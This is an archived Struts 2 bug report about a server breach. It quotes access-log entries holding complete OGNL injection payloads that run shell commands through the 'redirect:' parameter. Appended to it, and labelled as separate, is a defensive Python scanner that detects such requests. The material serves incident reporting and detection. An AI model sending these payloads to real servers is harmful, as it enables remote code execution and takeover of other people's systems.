struts-issues mailing list archives

Subject [jira] [Created] (WW-4304) Security issues with Struts 2.3.x
Date Wed, 19 Mar 2014 14:01:04 GMT
RAJA SEKHAR created WW-4304:

             Summary: Security issues with Struts 2.3.x
                 Key: WW-4304
             Project: Struts 2
          Issue Type: Bug
          Components: Core Actions
    Affects Versions: 2.3.12
         Environment: Ubuntu on Microsoft Windows Azure
            Reporter: RAJA SEKHAR
             Fix For: 2.3.12

I have analyzed the logs for SMA and I found out the following in log files:
- - [24/Feb/2014:04:31:49 +0000] "GET /testimonialsList.action?redirect:$%7B%23p%3Dnew%20java.lang.String(new+sun.misc.BASE64Decoder().decodeBuffer("d2hvYW1p")),%20%23a%3d%28new%20java.lang.ProcessBuilder%28%23p.split(%22%20%22)%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,,,%23e%3dnew%20char%5B50000%5D,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23arr%3Dnew%20int[1],,%20%23arr.{(%23len%3D%3D-1)%3F%23{%23len%3D-1}%3A{%23matt.getWriter%28%29.print%28new%20java.lang.String%28%23e,0,%23len%29%29,}},%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29%7D HTTP/1.1" 200 15
- - [24/Feb/2014:04:31:49 +0000] "GET /testimonialsList.action?redirect:$%7B%23p%3Dnew%20java.lang.String(new+sun.misc.BASE64Decoder().decodeBuffer("dW5hbWUgLWE%3D")),%20%23a%3d%28new%20java.lang.ProcessBuilder%28%23p.split(%22%20%22)%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,,,%23e%3dnew%20char%5B50000%5D,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23arr%3Dnew%20int[100],,%23arr.{(%23len%3D%3D-1)%3F%23{%23len%3D-1}%3A{%23matt.getWriter%28%29.print%28new%20java.lang.String%28%23e,0,%23len%29%29,}},%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29%7D HTTP/1.1" 200 115
I have seen these entries in the log file. Through this, the intruder has hacked the system by finding
the issue name/passwords etc., and he has taken control of the system.
By this he created files in the ROOT directory, and he was running DoS attacks on the system.
This led to a large data transfer, and a bill of $1000 was generated for our customer.
I found that the issue is fixed in version 2.3.16.
I have the following questions:
1) Are these issues fixed in 2.3.16?
2) Since the root cause of the problem is with Struts, do you reimburse the bill?

Please help us resolve this issue.

This message was sent by Atlassian JIRA
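As an added example, not part of this report or of the Struts project: a small Python scanner that flags access-log requests carrying OGNL expression markers inside the Struts 2 `redirect:`, `redirectAction:` or `action:` parameter prefixes, which is the shape of the entries quoted in the report. The sample log lines are constructed, and the marker list is an assumption chosen for this illustration.

```python
import re
from urllib.parse import unquote_plus

# Apache access-log shape as in the report; its entries start "- - [date]" with the
# client host omitted, so the first field is optional. The request is matched up to the
# quote before the status code, because OGNL payloads can contain literal quotes.
LOG_RE = re.compile(r'^(?:\S+\s+)?\S+\s+\S+\s+\[(?P<ts>[^\]]+)\]\s+"(?P<req>.*?)"\s+(?P<status>\d{3})(?:\s|$)')

# Struts 2 DefaultActionMapper parameter prefixes that were evaluated as OGNL before the
# fix, and expression markers (assumed list) whose presence in such a parameter is a strong indicator.
PREFIXES = ("redirect:", "redirectAction:", "action:")
OGNL_MARKERS = ("${", "%{", "#context", "#_memberAccess", "ProcessBuilder", "Runtime")

def suspicious_params(request_line):
    """Return (prefix, markers) for each prefixed query parameter carrying OGNL markers."""
    parts = request_line.split(" ")
    if len(parts) < 2 or "?" not in parts[1]:
        return []
    hits = []
    for chunk in parts[1].split("?", 1)[1].split("&"):
        raw_name, _, raw_value = chunk.partition("=")
        name, value = unquote_plus(raw_name), unquote_plus(raw_value)  # decode once
        prefix = next((p for p in PREFIXES if name.startswith(p)), None)
        if prefix is None:
            continue
        # In the report the expression sits in the parameter name after the prefix (there
        # is no literal "="), so inspect the rest of the name together with the value.
        found = [m for m in OGNL_MARKERS if m in name[len(prefix):] + value]
        if found:
            hits.append((prefix, found))
    return hits

def scan_log(lines):
    """Return (timestamp, status, prefix, markers) for every suspicious request in lines."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            for prefix, markers in suspicious_params(m.group("req")):
                findings.append((m.group("ts"), int(m.group("status")), prefix, markers))
    return findings

# Constructed sample lines: one ordinary request and one shaped like the report's
# entries, carrying a shortened OGNL expression in the redirect: prefix.
SAMPLE_LOG = [
    '10.0.0.5 - - [24/Feb/2014:04:30:00 +0000] "GET /testimonialsList.action?page=2 HTTP/1.1" 200 5120',
    '- - [24/Feb/2014:04:31:49 +0000] "GET /testimonialsList.action?redirect:$%7B%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27)%7D HTTP/1.1" 200 15',
]

FINDINGS = scan_log(SAMPLE_LOG)  # one finding, for the redirect: request
```

Run it over a real access log by feeding the file's lines to scan_log; a non-empty result is a reason to check for the file creation and outbound traffic the report describes.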
